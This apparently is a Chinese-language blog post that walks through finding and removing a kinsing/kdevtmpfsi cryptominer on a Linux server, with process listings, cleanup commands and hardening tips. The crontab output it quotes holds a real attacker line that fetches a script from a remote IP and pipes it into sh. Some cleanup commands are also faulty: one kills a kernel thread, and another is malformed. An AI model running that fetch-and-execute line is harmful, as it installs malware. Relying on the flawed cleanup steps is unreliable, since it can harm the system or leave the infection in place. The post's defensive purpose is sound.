清理挖矿程序
问题复现
没有启动什么占用资源的进程,但是4G内存直接快满了,cpu也高,基本可以判断是有挖矿程序在跑
如下情况
[mym@bigdata01 software]$ free -h
total used free shared buff/cache available
Mem: 3.9G 2.5G 168M 217M 1.2G 924M
Swap: 0B 0B 0B
[mym@bigdata01 software]$ jps
29218 Jps
[mym@bigdata01 software]$ top
top - 17:19:17 up 30 days, 23:51, 1 user, load average: 12.61, 13.41, 13.81
Tasks: 903 total, 2 running, 130 sleeping, 0 stopped, 771 zombie
%Cpu(s): 99.2 us, 0.8 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 4045104 total, 143448 free, 2645876 used, 1255780 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 945508 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
17154 mym 20 0 306132 269120 8 S 36.5 6.7 143:19.32 bash64
18993 mym 20 0 306132 269188 8 S 36.2 6.7 142:32.41 bash64
26095 mym 20 0 306136 269192 8 S 36.2 6.7 135:38.88 bash64
15594 mym 20 0 306136 269316 0 S 34.9 6.7 218:41.81 bash64
25774 mym 20 0 306136 269192 8 S 34.9 6.7 135:54.86 bash64
11389 mym 20 0 515392 265248 304 S 17.8 6.6 100:56.52 kdevtmpfsi
1149 root 39 19 301424 9116 1384 S 0.7 0.2 25:36.01 bcm-si
5024 mym 20 0 2279520 296732 0 S 0.7 7.3 54:55.15 java
15399 root 20 0 1399044 36028 4512 S 0.7 0.9 308:53.32 hosteye
4647 mym 20 0 2084548 175492 4028 S 0.3 4.3 15:24.83 java
5207 mym 20 0 2128716 245724 3068 S 0.3 6.1 28:51.30 java
10684 mym 20 0 256 96 0 S 0.3 0.0 0:18.55 124d1142x41u2ua
31075 mym 20 0 162784 3108 1580 R 0.3 0.1 0:00.27 top
1 root 20 0 125628 2980 1452 S 0.0 0.1 9:48.28 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.11 kthreadd
4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:0H
6 root 20 0 0 0 0 S 0.0 0.0 5:11.03 ksoftirqd/0
7 root rt 0 0 0 0 S 0.0 0.0 0:10.89 migration/0
8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh
9 root 20 0 0 0 0 S 0.0 0.0 7:38.80 rcu_sched
10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-drain
11 root rt 0 0 0 0 S 0.0 0.0 0:13.77 watchdog/0
12 root rt 0 0 0 0 S 0.0 0.0 0:10.37 watchdog/1
13 root rt 0 0 0 0 S 0.0 0.0 0:09.20 migration/1
14 root 20 0 0 0 0 S 0.0 0.0 43:35.45 ksoftirqd/1
16 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/1:0H
18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kdevtmpfs
19 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 netns
20 root 20 0 0 0 0 S 0.0 0.0 0:02.20 khungtaskd
21 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 writeback
一堆进程,其中kdevtmpfsi、kinsing等是挖矿程序进程
[mym@bigdata01 software]$ ps -aux | grep kinsing
mym 31234 0.0 0.6 119428 24528 ? Sl 11:00 0:03 /var/tmp/kinsing
mym 32336 0.0 0.0 112708 960 pts/0 R+ 17:21 0:00 grep --color=auto kinsing
[mym@bigdata01 software]$ ps -aux | grep kdevtmp
root 18 0.0 0.0 0 0 ? S Mar22 0:00 [kdevtmpfs]
mym 11389 21.6 6.5 515392 265248 ? Ssl 09:32 101:18 /tmp/kdevtmpfsi
mym 32411 0.0 0.0 112712 960 pts/0 S+ 17:21 0:00 grep --color=auto kdevtmp
自己也没有任何定时任务,然后查看crontab,也有挖矿的定时任务在,所以也要清理这里
[mym@bigdata01 software]$ crontab -l
*/1 * * * * export DISPLAY=:0 && /home/mym/.tmp00/bash >/dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1
清理
删除挖矿程序相关进程
[mym@bigdata01 software]$ kill -9 31234 18 11389
删除定时任务
[mym@bigdata01 software]$ crontab -r
删除进程的临时文件
[mym@bigdata01 software]$ cd /tmp
[mym@bigdata01 tmp]$ ls
hsperfdata_mym hsperfdata_root kdevtmpfsi linux.lock
[mym@bigdata01 tmp]$ sudo rm -rf kdevtmpfsi
[mym@bigdata01 tmp]$ ls /var/tmp
abrt for kinsing yum-mym-7oRfv9
[mym@bigdata01 tmp]$ sudo -rf /var/tmp/kinsing
再次全局查询下有没有遗漏
[mym@bigdata01 tmp]$ sudo find / -name kinsing
/var/tmp/kinsing
[mym@bigdata01 tmp]$ sudo find / -name kdevtmpfsi
/tmp/kdevtmpfsi
[mym@bigdata01 tmp]$ rm -rf /var/tmp/kinsing
[mym@bigdata01 tmp]$ rm -rf /var/tmp/kdevtmpfsi
预防
- 预防方式就是注意配置安全组,尽可能的少入站,尽可能的安全开放端口。或者弄个跳板机
- 使用密钥进行登录
- 默认端口都改掉,比如ssh的22,mysql的3306,redis的6379等
- 能设置密码的或者权限的都加上。虽然麻烦,但是没办法尽可能安全